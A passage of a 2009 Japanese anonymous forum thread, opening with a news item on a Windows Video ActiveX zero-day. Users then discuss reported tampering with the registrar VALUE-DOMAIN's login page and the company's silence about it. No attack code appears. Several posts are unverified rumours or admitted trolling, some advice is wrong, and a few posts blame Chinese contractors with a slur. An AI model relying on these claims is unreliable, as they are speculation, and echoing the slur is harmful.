 MicrosoftのWindowsに影響する新たな脆弱性が見つかり、これを悪用したゼロデイ攻撃が発生している。Microsoftは7月6日、アドバイザリーを公開して注意を呼び掛けた。

 Microsoftによると、脆弱性はVideo ActiveX Controlに存在し、Windows XPとWindows Server 2003が影響を受ける。Internet Explorer(IE)を使って悪用された場合、ユーザーが何もしなくてもリモートからコードを実行される恐れがある。

 SANS Internet Storm Centerによれば、この脆弱性を悪用するコードが中国の多数のWebサイトで公開され、それを使った攻撃が多発。何千ものWebサイトが改ざんされ、閲覧しただけでマルウェアに感染する状態になっているという。

 Microsoftは現在、脆弱性を解決するためのセキュリティアップデートを開発中。当面の回避策として、脆弱性のあるActiveX Control(msvidctl.dll)にキルビットを設定する方法を紹介している。自動的にこの回避策を適用できるツールも用意した。

 また、米McAfee、Symantecなど主要セキュリティ企業はウイルス対策ソフトの定義ファイルを更新し、今回の脆弱性の悪用コードを検出できるようにしたと発表している。

188:名無しさん@お腹いっぱい。
09/07/07 13:09:17 0
さすがに基幹までのっとられるようになったら終わりだな

189:名無しさん@お腹いっぱい。
09/07/07 13:17:42 0
ここの外注も中華系だよね?
ったく・・・ 前のウイルスの件で懲りなかったのかよ・・・

190:名無しさん@お腹いっぱい。
09/07/07 13:18:44 0
よく分からんけど
感染対象はIEで、vistaでは対象外って事でおk?

191:名無しさん@お腹いっぱい。
09/07/07 13:22:48 0
ここの、
その後の正規サイト改ざん〔後篇〕(3):新たな攻撃手法~「新Nine Ball」「8080」
URLリンク(www.so-net.ne.jp)

ここ読んどけ。
●「8080」:大量ドメインを使用する8080攻撃


192:名無しさん@お腹いっぱい。
09/07/07 13:38:55 0
2009.07.02
セキュリティ強化について

wwwwwwwwwwwwwwwwwwwwwwwwwwwww

193:名無しさん@お腹いっぱい。
09/07/07 13:49:06 0
配下サイトが全滅、恐怖の共有サーバー丸ごと改ざん~「5+1」件の事例報告
URLリンク(www.so-net.ne.jp)


いやー、こわいねー

194:名無しさん@お腹いっぱい。
09/07/07 14:00:34 0
まさに今回のはデジロ狙い撃ちでしょ?

この業界で商売してて狙われてあっさり撃たれるデジロ…orz

195:名無しさん@お腹いっぱい。
09/07/07 14:11:52 0
非常にお伝えしにくいのですが、実はVALUE-DOMAINのログインパスワードは、
ハッシュ化されていない、プレインテキスト記録なので、login.phpの書き変えが可能なら、
DBパスも取られているはずなので、もう既に全ユーザーのパスワードが割れて
いることになるのです。

196:名無しさん@お腹いっぱい。
09/07/07 14:22:10 0
だとしたらlogin.phpを改竄する意味は?

197:名無しさん@お腹いっぱい。
09/07/07 14:22:55 0
デジロ、login.php の書き換え事件についての公式声明を早く出せ。
これでも、だんまり戦術が通用すると思っているのか?

198:名無しさん@お腹いっぱい。
09/07/07 14:28:38 0
いつも通り放置してるだけですけどね

199:名無しさん@お腹いっぱい。
09/07/07 14:31:27 0
鉄壁なマイペースw

200:名無しさん@お腹いっぱい。
09/07/07 14:35:21 0
久々に来てみたら大変な事になっているじゃないか
今度のは今まででも最強だな・・・
オワタ

201:名無しさん@お腹いっぱい。
09/07/07 14:44:05 0
>>194
無差別攻撃で落ちたもののひとつなだけじゃないかと
まだ発覚してないところがありそう

202:名無しさん@お腹いっぱい。
09/07/07 14:45:11 0
今までも相当酷い障害はあったけど確かにこれは過去最強最凶クラスだ
これで実際の被害報告なんかが出だしたらニュースサイト巻き込んで七夕祭だなw

203:名無しさん@お腹いっぱい。
09/07/07 14:49:41 0
去年くらいから特に目だって続くこのデジロックの崩壊具合ったら何なの

204:名無しさん@お腹いっぱい。
09/07/07 14:50:17 0
>>194
動作からすると、感染経路はGENOとほぼ同じじゃないのかな。
そこから個別にlogin.phpに仕込むとか。。。ね。
ドメイン見れば美味しいエサってのはすぐ分かりそうだし、
domainでフィルタ読みされればイチコロ?

205:名無しさん@お腹いっぱい。
09/07/07 15:31:20 0
とりあえずセキュリティホールmemoに取り上げられたから、かなり知れ渡ってるさ。

206:名無しさん@お腹いっぱい。
09/07/07 15:33:21 0
何日の時点でログインしてたらアウト?

207:名無しさん@お腹いっぱい。
09/07/07 15:39:10 0
ところでまだ捏造を唱える社員の火消しは来ないの?

208:名無しさん@お腹いっぱい。
09/07/07 15:44:49 0
ここ2~3日はそれどころじゃないみたいだぞw

209:名無しさん@お腹いっぱい。
09/07/07 15:51:10 0
とりあえず安心して管理画面に入れない様じゃ何もできないんだが…

210:名無しさん@お腹いっぱい。
09/07/07 15:51:46 0
IPAも出ました~
URLリンク(www.ipa.go.jp)

211:名無しさん@お腹いっぱい。
09/07/07 16:00:32 O
とりあえず、管理ドメインを、enomのアカウントにプッシュしておいた。

さらに、enomアカウントのパスワード、メールアドレスを変更。
ロックもかけといた。

少し安心。。。

212:名無しさん@お腹いっぱい。
09/07/07 16:22:31 0
ソースは2ちゃんって困るし詳しくない人もVD使ってるから公式にアナウンスだしてくれないだろうか

213:名無しさん@お腹いっぱい。
09/07/07 16:33:19 0
こっそり消すようなところに期待しても無駄かと。

214:名無しさん@お腹いっぱい。
09/07/07 16:49:02 0
SymantecによるとIE8だと大丈夫そうな…ほんとやろか。
URLリンク(itpro.nikkeibp.co.jp)

215:名無しさん@お腹いっぱい。
09/07/07 16:56:02 0
FirefoxでVDの管理画面に入るのは、IEでないから大丈夫なの?
それとも同じく危険なのかな?

216:名無しさん@お腹いっぱい。
09/07/07 16:59:41 0
php改ざんの可能性が否定できない今、ブラウザは関係ない

217:名無しさん@お腹いっぱい。
09/07/07 17:02:56 0
>>216
本質を分かっていない奴はけーん

218:名無しさん@お腹いっぱい。
09/07/07 17:07:16 0
そーすが2ちゃんだけだと誰にもおしえれんやろー!

219:名無しさん@お腹いっぱい。
09/07/07 17:17:02 0
バカしかいないようだ

220:名無しさん@お腹いっぱい。
09/07/07 17:25:27 0
要するにもう安全ってこと?

221:名無しさん@お腹いっぱい。
09/07/07 17:26:49 0
IE6/7以外のブラウザなら問題ないんだろ
Firefoxなら大丈夫だろ

222:名無しさん@お腹いっぱい。
09/07/07 17:30:29 O
マカーで良かったナリ。

223:名無しさん@お腹いっぱい。
09/07/07 17:32:18 0
phpがなんだとかいってるのは関係ないんだ
で、phpってなに?

224:名無しさん@お腹いっぱい。
09/07/07 17:36:14 0
本じゃない?

225:名無しさん@お腹いっぱい。
09/07/07 17:36:29 0
出版社

226:名無しさん@お腹いっぱい。
09/07/07 17:38:34 0
Vistaなら大丈夫なのか、よかった
ようするにウイルス埋め込まれたってこと?
感染しないなら関係ないや

227:名無しさん@お腹いっぱい。
09/07/07 17:39:54 0
ブラウザはXP、2003以前のIEだと攻撃を食らう
だから、それ以外でログインしてるなら、埋め込みスクリプトからは身を守れる

しかし、ログインフォームが改竄され、デジロ広報が把握してない誰かの手によって修復されたのが、現在残る懸念材料
こう易々と改竄されているとなると、一見正常なログインフォームでも内部をいじられている可能性がある
だから、正式アナウンスが出てないうちは安易にログインしないほうがいいって話だ

228:名無しさん@お腹いっぱい。
09/07/07 17:44:03 0
よくわかんないけど、IE6/7はウイルスに感染するし、
かといって、ほかのブラウザでアクセスしても、こっちのブラウザに関係なくvalue-domain.comのサーバのほうで
何か情報送信とかしてるかもしれない、そんな二重の構えで待ち伏せされてる状態ってこと?

229:名無しさん@お腹いっぱい。
09/07/07 17:46:07 0
co.ukとorg.ukのドメイン持ってるけど
移管できるとこがのきなみ高いっていうね…
こりゃ参った

230:名無しさん@お腹いっぱい。
09/07/07 17:49:38 0
情報源が2chなんて信用できんな
捏造かもしれん

231:名無しさん@お腹いっぱい。
09/07/07 17:50:26 0
テンプレの3、4って、どうなの?

232:名無しさん@お腹いっぱい。
09/07/07 17:51:49 0
login.php を変更したのが、誰なのか分からない内は、ログインすること自体が危険
デジロがlogin.phpの改ざんを発見して対応修正したのなら、まだいいが、
もし修正したのが「デジロ」なら、公式にアナウンスが来て当然
公式アナウンスが無い=不安要素一杯 ということ。




233:名無しさん@お腹いっぱい。
09/07/07 17:53:40 0
これは、他社の捏造ですよ。気にすることない。安全安全。



234:名無しさん@お腹いっぱい。
09/07/07 17:54:52 0
firefoでよかった!

235:名無しさん@お腹いっぱい。
09/07/07 17:57:26 0
もうちょっと上手く釣ってくれよ
あまりに白々しいとつまらんよ

236:名無しさん@お腹いっぱい。
09/07/07 18:02:24 0
このスレに名うての釣り師なんていないと思う

237:名無しさん@お腹いっぱい。
09/07/07 18:02:31 0
2ちゃんねるの情報は信用ならん
どっかのニュースサイトに取り上げられたら信用する

238:名無しさん@お腹いっぱい。
09/07/07 18:04:04 0
3,4は今見たらエラーページになってた
昼、見たときは見れたんだけど
焦ったけど、一応>>85-86のコードはないみたい
じゃあ>>180

239:名無しさん@お腹いっぱい。
09/07/07 18:05:42 0
なんだただの捏造か

240:名無しさん@お腹いっぱい。
09/07/07 18:11:58 0
>>92の魚拓の中にドメイン移管方法ってページがある
>>URLリンク(www.value-domain.com)
これで、どうでしょう?

241:名無しさん@お腹いっぱい。
09/07/07 18:14:55 0
魚拓は開かないほうがいい
ウイルスいるから

242:名無しさん@お腹いっぱい。
09/07/07 18:15:15 0
定期デジロマンセー厨は、ガチ社員とアンチ煽り基地外がいるよね
今湧いてるのは後者の方だね

243:名無しさん@お腹いっぱい。
09/07/07 18:18:44 0
なにもなかった、捏造捏造、気にすることはない、デジロのセキュリティは鉄壁


244:名無しさん@お腹いっぱい。
09/07/07 18:26:04 0
まあこのまま大した実害報告もなく終息すれば例の如く公式アナウンス無く終息コースだね。

実害出なきゃ騒ぐ事でもないし。
ただ今回の件は事が事だけに、今後の成り行きはどうあれ何らかのアナウンスは必要だろうな。

245:名無しさん@お腹いっぱい。
09/07/07 18:27:26 0
今のところ特にVDユーザーでサイト改竄されたとかの被害報告ないよね?

246:名無しさん@お腹いっぱい。
09/07/07 18:29:15 0
被害報告ないし大丈夫でしょ
ログインページが改ざんされた程度だし

247:名無しさん@お腹いっぱい。
09/07/07 18:30:33 0
実害がないなら、アナウンスも不要
このスレ、早く埋めましょう

248:名無しさん@お腹いっぱい。
09/07/07 18:33:23 0
揉み消し工作してんじゃねぇよ

249:名無しさん@お腹いっぱい。
09/07/07 18:33:26 P
少なくとも昨夜から未明あたりに居たスレ住人は、検証してくれたり参考URL貼ってくれたり不明な点を解説してくれたり、
(デジロが法に触れるとか言いつつ根拠を問うとググレカスの一言で逃げた奴も居たけどw)
概してまともな書き込みが多かった気がするのだが、一晩経つと、こうも違うんだなぁという妙な感慨。
まぁ、予想通りだけどw

250:名無しさん@お腹いっぱい。
09/07/07 18:47:41 0
実害が今のところ報告されてないから… だけどね。あくまで。

どうあれデジロからの公式アナウンスが無いとおちおち管理画面にログインできないって状況は変わらないから、現時点で問題にすべきはその辺だろう。

251:名無しさん@お腹いっぱい。
09/07/07 18:50:54 0
まあ、少なくともlogin.phpが改竄されてたのは事実なんだし
それなら>>167の言うとおり登録ユーザーが5000以上なら
報告しなければ違法になる。

252:名無しさん@お腹いっぱい。
09/07/07 18:52:37 O
今回は、閲覧者のPCに対するウィルスの仕込みと、ログイン時のパス抜きの二段構え。

パス抜きがいつぐらいに仕組まれたかが問題だな。

253:名無しさん@お腹いっぱい。
09/07/07 19:01:28 0
実害がないとか言ってるけど、おまえらパス抜きクラッカーが即行動起こすと思ってるのか?w
最近はばれない様に暫くトラッキングして他の情報もぶっこ抜いてるんだぜ
被害が公になるのは数ヵ月後だ、潜伏期間が長いのさ

254:名無しさん@お腹いっぱい。
09/07/07 19:06:54 0
だからこそ現時点での中間報告でも デジロからの公式アナウンスが必要なんだけどな

認知した事すらアナウンスしないんだから ちょっと酷すぎるよいくら何でも

255:名無しさん@お腹いっぱい。
09/07/07 19:10:14 0
>>252
GENOもそうだった

256:名無しさん@お腹いっぱい。
09/07/07 19:10:16 0
>>211はeNomからアカウント変更したみたいじゃね
テンプレの3、4って、どうなのよ?


257:名無しさん@お腹いっぱい。
09/07/07 19:10:35 0
またオナニストか

258:名無しさん@お腹いっぱい。
09/07/07 19:22:19 O
テンプレの3、4のやり方ではドメインプッシュはできない。

259:名無しさん@お腹いっぱい。
09/07/07 19:29:57 0
原爆と同じ流れなのに釣られる人ってなんなの!

260:名無しさん@お腹いっぱい。
09/07/07 19:30:52 0
本当ならフォーラムで大騒ぎだろ

261:名無しさん@お腹いっぱい。
09/07/07 19:35:11 0
実は全部がせなんじゃね
魚拓とかウイルス報告も捏造とか

262:名無しさん@お腹いっぱい。
09/07/07 19:36:29 0
>>240は?
魚拓からだとコードがあるけど
直接とべばソースにはコードなかった
>>151,187にあるように XPとWindows Server 2003
IEが攻撃対象ということだから
誰かドメイン持ってる人でVista、IE以外の
ブラウザの人やってみてくれないかな

263:名無しさん@お腹いっぱい。
09/07/07 19:38:13 0
おまえそのレス連射パターン定番だよな
いちいち構ってあげたから、次からは少し目新しいのにパターン変えろよ

264:名無しさん@お腹いっぱい。
09/07/07 19:38:44 0
馬鹿はとりあえず過去レスに目を通せよこの馬鹿

265:名無しさん@お腹いっぱい。
09/07/07 19:45:05 0
アクアナがおかしいんだけど

266:名無しさん@お腹いっぱい。
09/07/07 19:50:23 0
アグネス(チャン)のがおかしいです

267:名無しさん@お腹いっぱい。
09/07/07 19:57:47 0
エラーページだけど、すでに修正済み?
キャッシュのほう見ればいいの?

268:名無しさん@お腹いっぱい。
09/07/07 20:07:09 0
問題無し、既にセキュリティ修正済、デジロ最強
捏造にだまされるな。

269:名無しさん@お腹いっぱい。
09/07/07 20:07:43 0
>>214
だめだと思う。「IEの」脆弱性じゃないし、一番詳しいはずの製造元の
MicrosoftセキュリティアドバイザリでもOS(XP・2003がやられる)にしか触れてない。

270:名無しさん@お腹いっぱい。
09/07/07 20:09:10 0
今度はsageで社員乙といいたいんですね。わかります。

271:名無しさん@お腹いっぱい。
09/07/07 20:17:19 0
もう、さくらにするお(´;ω;`)

272:名無しさん@お腹いっぱい。
09/07/07 20:22:02 0
なぜわざわざ高価なさくら? 普通はムームーとかFC2じゃない?

273:名無しさん@お腹いっぱい。
09/07/07 20:27:09 0
上場企業だから?>さくら

274:名無しさん@お腹いっぱい。
09/07/07 20:30:46 0
一気に収束しててわろたwオナニスト乙w

275:名無しさん@お腹いっぱい。
09/07/07 20:31:49 0
冗談だお。VD最高だお( ^ω^ )

276:名無しさん@お腹いっぱい。
09/07/07 20:35:47 0
デジロ最強(^^)/

277:名無しさん@お腹いっぱい。
09/07/07 20:36:18 0
>>271
さくらも去年別な手法(ARPスプーフ。サーバのコンテンツ改竄ではなく
経路上での改竄。FTPで見ても正常なのでわかりにくい)でやられてるよね。
URLリンク(www.sakura.ad.jp)
URLリンク(www.sakura.ad.jp)

278:名無しさん@お腹いっぱい。
09/07/07 20:48:40 0
今日の昼頃と夕方にログインしちまったけど大丈夫かな。


279:名無しさん@お腹いっぱい。
09/07/07 21:05:46 0
結局いつものうやむやか。orz
まともにしたら金かかるのは分かるがここまでコスト掛けないのも徹底してるな。
入金処理/コピペ対応人員だけで今回も乗り切ろうと?

280:名無しさん@お腹いっぱい。
09/07/07 21:07:39 0
2chデジロ関連スレ工作&会話誘導要員のコスト計上を忘れてますよ

281:名無しさん@お腹いっぱい。
09/07/07 21:13:17 0
フォーラムに書き込んでこいよ

282:名無しさん@お腹いっぱい。
09/07/07 21:18:51 0
フォーラムからログインして意味あるの?
ソースにコードはなかったけど

283:名無しさん@お腹いっぱい。
09/07/07 21:22:10 0
誰もフォーラムに報告をしていない
つまりはそんなことはなかった
2ちゃんねるだけの現象

284:名無しさん@お腹いっぱい。
09/07/07 21:25:28 0
あんなクローズな空間でクローズなやり取りしてどうすんだよw
つか今サポ板も何か辺だぞ

285:名無しさん@お腹いっぱい。
09/07/07 21:27:38 0
>>283

見えない敵と常に戦い続けないといけない性分って大変だね・・・
何がしたいの? 話聞いてあげるよ。

286:名無しさん@お腹いっぱい。
09/07/07 21:38:39 0
じゃあこれも無かったことなんだな
URLリンク(wepawet.cs.ucsb.edu)

287:名無しさん@お腹いっぱい。
09/07/07 21:53:44 0
やっばついこの間にムームーに移管しておいて正解だったな。
まあ俺は大丈夫だけど最悪ドメイン乗っ取られたり、
勝手にドメインを売買されたりするかもな。

288:名無しさん@お腹いっぱい。
09/07/07 22:04:24 0
>>284
何か変って?書き込めないとか?

289:名無しさん@お腹いっぱい。
09/07/07 22:04:34 0
これか?
URLリンク(muumuu-domain.com)

290:名無しさん@お腹いっぱい。
09/07/07 22:04:44 0
騒ぎになってるから見に来たんだが
ネームサーバがボロボロになってるってマジ??
ドメイン管理提供しててありえないだろ
どうなってんだよこの会社は

291:名無しさん@お腹いっぱい。
09/07/07 22:12:58 0
もうログインしても大丈夫なのか?
そもそもソースを改鼠されるってどんな状況なんだよ

292:名無しさん@お腹いっぱい。
09/07/07 22:14:53 0
ネームサーバがボロボロって、もう丸一ヶ月経つぞ。
login.phpの改ざんの件が目下の最重要問題。

ログインしても問題ないかどうかは神のみぞ知る。

293:名無しさん@お腹いっぱい。
09/07/07 22:18:18 0
なんか出張行ってる間にずいぶんスレが伸びてると思ったらえらいことになってるんだな。
まあ、俺は常時javascriptはoffにしてるから今回の問題は関係ないけど。

あ、支払いの時だけはjavascript許可しないと動作しなかったのでonにしたけど、かなり前の話しだし。

294:名無しさん@お腹いっぱい。
09/07/07 22:28:36 0
クラッカーがPHPを自由に改ざんできたとすると、
パスや個人情報を引き抜き放題だった可能性があるな。
そうだった場合どうなることやら。

295:名無しさん@お腹いっぱい。
09/07/07 22:32:51 0
話をすりかえるのに必死なのがいるなw

296:名無しさん@お腹いっぱい。
09/07/07 22:35:26 0
>>293
クライアントPCは無事かもしれないけど無関係とはいえないよ

297:名無しさん@お腹いっぱい。
09/07/07 22:40:27 0
つかPHP改竄できたのなら
個人情報ぶっこ抜きとか簡単にできるじゃろ
ろぎんしてないから関係ないよね(キリッ
って何アホなこと言ってんだよ

298:名無しさん@お腹いっぱい。
09/07/07 22:43:52 0
なんかドメイン乗っ取られたっぽい。サイトが変な広告サイトになってる。
whoisしても全く知らん所になってるし。
あとなんかログインできなかったからパスワード再発行したけど梨の礫。

もうだめぽ。

299:名無しさん@お腹いっぱい。
09/07/07 22:47:19 0
>>298
デジロユーザーざまぁwwwwwwwww


300:名無しさん@お腹いっぱい。
09/07/07 22:47:49 0
>>298
いよいよ実害報告ですか
もうちっと詳しく教えていただけませんか?

301:名無しさん@お腹いっぱい。
09/07/07 22:51:06 0
>>289>>104あたりでダメなのか
>>293
よく分からん。>>151ならAdobeReader、FlashPlayer最新バージョン、
javaスクoffならログインしてもいいのか
なんか別のとこで、それではダメだったケースがあったが
念のためブラウザIE以外にしといたほうのがいいのか
それでは、まるっきりGENOといっしょだが
自分では確認できんので、どうしようもない

302:名無しさん@お腹いっぱい。
09/07/07 22:52:05 0
>>298
釣りじゃないならもっと詳しい情報を

303:名無しさん@お腹いっぱい。
09/07/07 22:55:03 0
0-day攻撃だったのは分かるんだが
どうやってlogin.phpに仕込んだのか謎のままだな

304:名無しさん@お腹いっぱい。
09/07/07 22:57:11 0
>>300
さっきサイトを確認しようとしたらサイトが変な広告サイトななってて、
whoisで確認したらIPから所有者情報まで全部書き変わってた。

あとログインしようとしてもできなかったんでパスワード再発行したんだけど、
そのメールも全く届かない。

サポには連絡したけどどうしようも無い状態。

305:名無しさん@お腹いっぱい。
09/07/07 22:59:15 0
気になって一応うちのドメインサイト全チェックしたけど問題なし。

>>304はとりあえずトリップつけてくれ

306:名無しさん@お腹いっぱい。
09/07/07 22:59:56 0
>>304
乗っ取られたっていうドメインさらしてくれないと
釣りかどうか判断できんのだが

307:名無しさん@お腹いっぱい。
09/07/07 23:00:54 0
>>301
>>151とか上のほう少しは読めよ

308:名無しさん@お腹いっぱい。
09/07/07 23:02:10 0
最後にログインしたのはいつ?
該当期間中にvalue-domain.comで何か設定変えた? (クッキー抜かれた?)


309:名無しさん@お腹いっぱい。
09/07/07 23:02:18 0
>>304
やふーやぐーぐるはどうなりますか?
なんらかのウイルスに感染しててちがうとこ見に行ってるとか
あるかもしれない

310:名無しさん@お腹いっぱい。
09/07/07 23:03:27 0
ネタかマジか全然わからんしなあ

311:名無しさん@お腹いっぱい。
09/07/07 23:04:11 0
>>304
以下の情報も教えてほしい:

(1) TLDは何? .com? .net? .jp?

(2) 有効期限はいつまで?

312:名無しさん@お腹いっぱい。
09/07/07 23:06:03 0
ドメインロックしてたかどうかとか。

313:名無しさん@お腹いっぱい。
09/07/07 23:06:35 0
ネタでしょ、登録期限切れだったというオチかな、

314:名無しさん@お腹いっぱい。
09/07/07 23:08:51 0
本当なら大事件だ。ありえん。

315:名無しさん@お腹いっぱい。
09/07/07 23:09:51 0
つーか釣りじゃねーの?
タイミングよすぎるだろ。

316:名無しさん@お腹いっぱい。
09/07/07 23:09:53 0
こんなけ騒いでるのに国から指導とかされないから
アンチが騒いでるだけなんじゃないかと思ってしまうんだが、、

317:名無しさん@お腹いっぱい。
09/07/07 23:10:26 0
> whoisで確認したらIPから所有者情報まで全部書き変わってた。
がネタ臭い

318:名無しさん@お腹いっぱい。
09/07/07 23:10:35 0
悲惨な事になってるな。
仕事でも使ってるのに、洒落にならん…

少し高くても別のところにするしかないかなぁ…

319:名無しさん@お腹いっぱい。
09/07/07 23:12:35 0
>>317
確かに. WHOISにIPは普通出てこない.

320:名無しさん@お腹いっぱい。
09/07/07 23:12:38 0
>>316
ログインフォームを改ざんされたのは事実
個人情報抜かれた可能性があるのも事実

321:名無しさん@お腹いっぱい。
09/07/07 23:12:39 0
だから、ドメイン何よ、
既に登録内容変わっているなら、さらしてもなんら問題無いでしょ。

322:名無しさん@お腹いっぱい。
09/07/07 23:13:17 0
>316
> 国から指導とかされないから

そんなに速攻で動くわけないだろハゲ

323:名無しさん@お腹いっぱい。
09/07/07 23:14:33 0
単一報告では釣り臭さが拭えないね
まあ昨日今日だけでもコンパネログインした人間も相当数いるだろうから今後どうなるか

とりあえず糞デジロ何かアナウンスせいよw

324:名無しさん@お腹いっぱい。
09/07/07 23:14:56 0
実は釣りでした。
食いついたおまいら涙目wwwwwww

325:名無しさん@お腹いっぱい。
09/07/07 23:18:24 0
世界的なニュースになるけで、そんなネタには釣られませんが。
レジストラ/代行がそれやられちゃうと、核爆弾並みの被害ですわ。

326:名無しさん@お腹いっぱい。
09/07/07 23:21:23 0
>>307
ActiveX コントロールを殺しとけばIEでもいいのか
>レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。
URLリンク(support.microsoft.com)


327:名無しさん@お腹いっぱい。
09/07/07 23:22:08 0
>>324
誰も釣られてないだろ
具体性の無い文章で釣ったつもりか?

328:名無しさん@お腹いっぱい。
09/07/07 23:23:00 0
所詮は後釣り宣言

329:名無しさん@お腹いっぱい。
09/07/07 23:23:33 0
つーか釣りだろ
whoisでIPわかるはずないし
あとさっきから報告の続きないし

330:名無しさん@お腹いっぱい。
09/07/07 23:25:23 0
>>325->>329
まあまあ
デジロ社員じゃない方の例の子っぽいからもっと愛に溢れたレスを沢山つけてあげて下さい・・・
お世話かけさせますけどすいませんね

331:名無しさん@お腹いっぱい。
09/07/07 23:29:40 0
      ,―――ヽ、
   ,/           ~\
  /   ,へ_Vへ__    ~\
/   ノ         ゜ー-、  `ヽ
|    ノ / ̄\   / ̄~ヽ ヽ    i
|   ノ              |  ノ
\  |  <●>  <●>  (  )
 \ |      | |       i /
    |      /  ヽ       レ そろそろ僕の出番ですね
   i     (●_●)      / IPAの誇りをかけて
    i、    ,-―-、   ・ / ValueDomainを
    i、  <(EEEEE)> ∵/
      i、   \___/  _/ まピョーん☆
       \       ,ノ
  ,,.....イ.ヽヽ、ー-―一ノ゙-、.
  :   |  '; \_____ ノ.| ヽ i
      |  \/゙(__)\,|  i |
      >   ヽ. ハ  |   ||


332:名無しさん@お腹いっぱい。
09/07/07 23:32:08 0
デジロックの技術水準っていうか、レベルの判定って難しい気がする。
ネームサーバーだって、ハッキリ言えば、どこでも危険で、bindの話しだし、
login.phpが書き換えられたってのは、本当にどんなセキュリティを突かれたのか、
興味深いな。
確かなのは、zendでコンパイルしていないっぽいのと、何からの
穴があったとのでは?と推測の領域。ディレクトリをdigできる様なアップロードするような
仕組みがあったと思えないんだよな。FTPなんか空いているわけないし、
不審な部分と言えば、決済の外部業者渡しくらい?
しかし、これもクレカの処理を内部で行っていない分、セキュアだしな。

333:名無しさん@お腹いっぱい。
09/07/07 23:37:01 0
> FTPなんか空いているわけないし 云々

なぜ言い切れる?

334:名無しさん@お腹いっぱい。
09/07/07 23:37:59 0
先月のイベントでムームーに逃げて良かった…と思いたいが…
XREA+の更新時期なんだよ~
やべぇ
閉鎖もできん…

335:名無しさん@お腹いっぱい。
09/07/07 23:38:33 0
>>333
俺なら閉じる。
百歩譲って、FTPSでお願いします。

336:名無しさん@お腹いっぱい。
09/07/07 23:43:48 0
まっとうなネットサービス系の会社ならFTP開けたりせんのだけどな

337:名無しさん@お腹いっぱい。
09/07/07 23:46:36 0
まっとうなら、な。
そんなの百も承知で聞く。

なぜ言い切れる?

338:名無しさん@お腹いっぱい。
09/07/07 23:47:06 0
普通に外注のシナチク技術者の仕業かなと思ったんだけど
それだったらlogin.php弄る理由がないんだよね…

339:名無しさん@お腹いっぱい。
09/07/07 23:48:05 0
>>337
> $ ftp www.value-domain.com
> Connected to www.value-domain.com.
> Connection closed by remote host.

340:名無しさん@お腹いっぱい。
09/07/07 23:48:40 0
>>337
統計的な話になるのだが、この種の事故の大部分は
サーバーサイド言語で作られたプログラムの穴が大半です。
ポートの穴やハード的な原因は最後の最後に疑うべきというのが、
今風じゃないのかな?

341:名無しさん@お腹いっぱい。
09/07/07 23:49:59 0
>>339
おいおい、FTPデーモンがおるやんけ 汗

342:名無しさん@お腹いっぱい。
09/07/07 23:50:05 0
login.php、login.phpって言ってるやつ、ちょっと必死すぎない?

343:名無しさん@お腹いっぱい。
09/07/07 23:51:14 0
login.php、login.php

344:名無しさん@お腹いっぱい。
09/07/07 23:54:35 0
SSHじゃなくて、telnetが開いていたに1票

345:名無しさん@お腹いっぱい。
09/07/07 23:54:49 0
そういやユーザーフォーラムには誰も投稿してないよね
必死なのは2ちゃんだけだな

346:名無しさん@お腹いっぱい。
09/07/07 23:56:56 0
>>339
他からうpできる穴がある可能性は?

347:名無しさん@お腹いっぱい。
09/07/07 23:57:41 0
すべてのことが釣りだった場合は、釣られた。

348:名無しさん@お腹いっぱい。
09/07/07 23:57:48 0
ユーザーフォーラムに行くのですら危険だと思ったら、投稿されていなくて当然だろう


349:名無しさん@お腹いっぱい。
09/07/08 00:00:44 0
>>346
イワユル、ウェルノウンポートと言われるポートでは、難しいので、
そうじゃない、ポートとか?
DNSが開いていてもそう簡単には掘れないと思うし、対策済みかと

350:名無しさん@お腹いっぱい。
09/07/08 00:03:59 0
>>345
キーロガーの存在に気がつかなかった可哀想なユーザーが、いつも通りログインし、ユーザーフォーラムを使っているのだよ


351:名無しさん@お腹いっぱい。
09/07/08 00:06:06 0
telnetとかftpあけたままとか・・ど素人なのか?
技術者が抜けて今や素人だけで運営してるとか?

352:名無しさん@お腹いっぱい。
09/07/08 00:08:43 0
知ってる奴はヤバいのでフォーラムに近寄らない

誰も警告を発しないし、当然デジロからのニュースリリースも無い

知らない奴は普通にフォーラムに書き込もうとログイン

マルウェア増殖、仕掛けた奴(゚д゚)ウマー

とこういう自体な訳だな

353:名無しさん@お腹いっぱい。
09/07/08 00:13:17 0
昨日、リアルタイムで改ざんされてたの見たけど、
魚拓とか、それに続く状況報告とか、詳細まで踏み込まれはじめたときに、
ふと気づいたら改ざん部分が戻っていたんだよな

せめて改ざんへの対応をしたのか否かくらいは早く告知ほしいが、
その告知がでたところで、この状況じゃ、告知それ自体が改ざんかもしれない


354:名無しさん@お腹いっぱい。
09/07/08 00:16:32 0
ちょっと質問なんですが、
ユーザーサポートの
URLリンク(sb.xrea.com)
vBulletinが改ざんされたってことでしょうか?
value-domainのloginがやられたかと思ってたよorz

355:名無しさん@お腹いっぱい。
09/07/08 00:20:38 0
>>354
value-domainのloginページが改ざんされていた
現在は修正されているが、告知はない

356:名無しさん@お腹いっぱい。
09/07/08 00:21:38 0
>>355
それなら告知すべきことですね。ヤバイレベルです。
vBulletinはOSSなんでセキュリティホールもあり得るので。

357:名無しさん@お腹いっぱい。
09/07/08 00:22:26 0
value-domain.comのlogin.phpを書き換えられる環境にある奴が
sb.xrea.comのvBulletinのログインに手出してないと考える方が甘いって事だろ

358:名無しさん@お腹いっぱい。
09/07/08 00:32:25 0
login.php自体が書き換えられたかは未だ不明でしょ?

359:名無しさん@お腹いっぱい。
09/07/08 00:32:39 0
真偽確認&アナウンスするはずの対応部署とやらに連絡がいったとされる時間から、もうすぐ24時間

さて、これは告知まで何日かかるかな

360:名無しさん@お腹いっぱい。
09/07/08 00:34:01 0
>>358
それはともかくlogin.phpにリクエストを出して戻ってきたコードに埋め込まれていたのは確か

361:名無しさん@お腹いっぱい。
09/07/08 00:48:06 0
今でもその改竄された時点での魚拓とかある?

362:名無しさん@お腹いっぱい。
09/07/08 00:49:37 0
>>361
>>92がまだ見られるんじゃないかな

363:名無しさん@お腹いっぱい。
09/07/08 00:49:53 0
改竄事件は、他社工作員の捏造。。気にする必要なし。
デジロのセキュリティは万全。

364:名無しさん@お腹いっぱい。
09/07/08 00:50:55 0
>>363
今日は遅出勤務なの?
何時まで?

365:名無しさん@お腹いっぱい。
09/07/08 01:02:01 0
いまだ何もアナウンスがないなんて企業としてどうかしてる。

366:名無しさん@お腹いっぱい。
09/07/08 01:03:21 0
>>354のサポートページ自体はソースに
>>31-32の変数コードなかったけど
ログインしてみないと、その先は分からないからな
フォーラムもトップは大丈夫だけど
ログインしてみないと分からない

>>362  
魚拓はコード残ってるから開かないほうがいい

